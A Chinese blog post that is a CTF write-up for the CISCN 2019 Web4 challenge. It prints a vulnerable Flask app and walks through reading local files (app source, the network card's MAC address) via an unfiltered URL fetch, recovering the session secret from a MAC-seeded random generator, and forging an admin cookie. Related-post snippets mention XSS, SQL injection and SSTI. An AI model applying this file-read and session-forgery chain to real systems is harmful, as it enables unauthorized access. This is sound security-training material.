[CISCN 2019华东南]Web4 day5

最新推荐文章于 2024-05-20 22:08:52 发布
最新推荐文章于 2024-05-20 22:08:52 发布
阅读量626 收藏
点赞数
分类专栏: 五月一天一道题 文章标签: html 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/130795879
版权

考察:任意文件读取

          获取网卡地址

         伪随机

打开界面,点击read somethings直接进行了跳转

 直接修改url,发现没显示,但是访问错误的路由就会有no response

 读取flag也无果,那就读一下/app/app.py,为什么读这个,因为做了很多题文件路径都是这个

# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

发现需要修改cookie,密钥就是网卡mac伪随机生成的

直接读取网卡         /sys/class/net/eth0/address

import random
random.seed(0x0242ac02b16c)
print(str(random.random()*233))

这里如果python3不对,就改为python2,然后flask_session生成cookie

 

最后获得flag

 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华东北赛区]Web2
weixin_43940853的博客
03-18 389
注册登录后,观察这两个页面 联想到存储型xss盗取cookie,下面我们要做的就是触发xss代码 经过测试这里要用HTML Markup转码 in_str = "eval(alert(/xss/))" list = "" for tr in in_str: list += "&#" + str(ord(tr)) print(list) <svg><scri...
[CISCN2019 华北赛区 Day2 Web1]Hack World
evil_ming的博客
04-23 78
打开靶机 意思是在flag表里的flag字段,然后需要我们提供id。 先输入列数试试。 1 想什么东西,继续 2 嘛,如果愿意直接给flag我那也不是不能将就的。 3 欧克到这里就不行了。 用bp简单抓个包然后发送到intruder,字典上网搜了些sql常用的字符,跑了一下发现 这些显示482 猜测是布尔盲注 浅学一下 很烦,按照大佬的脚本结果返回Process finished with exit code 1给我,搞了两个小时,暂时放着吧。 ...
ciscn2019华北赛区半决赛day2_web1题解
weixin_30776273的博客
08-12 250
比赛结束以后采用非官方复现平台做的题,和比赛题有轻微不同,比赛中存放flag的table是ctf,这里是flag。 题目地址 buuoj.cn 解题过程 题目中只有一个页面,需要提交id。 id为1,2时,可以分别得到一句话。id为0时,显示error,可能是因为结果为空集。 id=1 Hello, glzjin wants a girlfriend. id=2 Do you wa...
CISCN2019web刷题记录
m0_73239569的博客
04-07 972
考虑能将某种进制的数字字符串转换成特定字符串的函数,类似hex2bin(),因为 hex2bin() 接收的十六进制数字字符串("5f474554")可以由整型数字(1598506324)通过 dechex() 函数转换得到,而 hex2bin() 返回一个特定的字符串。,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造ssti:payload。
练[CISCN2019 华东赛区]Double Secret
m0_66225311的博客
10-10 231
`flask`框架报错源码泄露,使用脚本进行`RC4`加解,`ssti`使用内置函数进行模板注入
web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1805
ctf_BUUCTF_web
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4310
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
BUUCTF Web 第二页全部Write ups
yym68686
07-09 1260
目录[强网杯 2019]高明的黑客[BUUCTF 2018]Online Tool[RoarCTF 2019]Easy Java[GXYCTF2019]BabyUpload[GXYCTF2019]禁止套娃方法一方法二方法三[BJDCTF2020]The mystery of ip[GWCTF 2019]我有一个数据库[BJDCTF2020]Mark loves cat[BJDCTF2020]ZJCTF,不过如此[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[De1CTF 201
buuctf刷题之旅之web(二)
qq_50589021的博客
08-19 2968
2021-5-23 [BUUCTF 2018]Online Tool 题目: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GE
华东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
华东师范大学2019计算机考研839试卷及答案
华东师范大学2019 839.docx
06-25
华东师范大学计算机技术(085211)839 2019年真题回忆版以及答案
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
华东师范大学2019年毕业生就业质量报告.pdf
04-12
华东师范大学2019年毕业生就业质量报告.pdf
华东理工大学2019年毕业生就业质量报告.pdf
04-12
华东理工大学2019年毕业生就业质量报告.pdf
HTML静态网页作业(HTML+CSS+JS)——动漫蜡笔小新网页设计制作(4个页面)
weixin_42283461的博客
05-20 341
HTML静态网页作业(HTML+CSS+JS)——动漫蜡笔小新网页设计制作(4个页面)
Web开发——HTML&CSS
最新发布
一切皆是定数的博客
05-20 161
HTML:HyperText Markup Language,超文本标记语言超文本:超越了文本的限制,比普通文本更强大。除了文字信息,还可以定义图片、音频、视频等内容。标记语言:由标签构成的语言,HTML标签都是预定义好的。HTML代码直接在浏览器中运行,HTML标签由浏览器解析。CSS:Cascading Style Sheet,层叠样式表,用于控制页面的样式(表现)。以下就是html代码以及css样式搭配之后的显示效果。
HTML常见标签-换行标签-水平线标签
weixin_44201223的博客
05-14 185
换行标签 水平线标签
HTML的使用(中)
weixin_74141222的博客
05-14 1047
在许多网页平台上浏览,大多逃不了登录账号。此时在网页中填写的用户名文本框与密码文本框,就属于HTML的表单元素。以上就是HTML表单的内容了,表单提供了大量能使浏览器用户快速便捷地填写数据的方法,构建了数据的交互传输。
2024华东杯数学建模
05-03
2024华东杯数学建模是一项面向大学生的数学建模竞赛活动,旨在培养学生的数学建模能力和团队合作精神。该比赛通常由华东地区的高校或研究机构主办,参赛队伍来自各个大学。 在比赛中,参赛队伍需要根据给定的实际...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值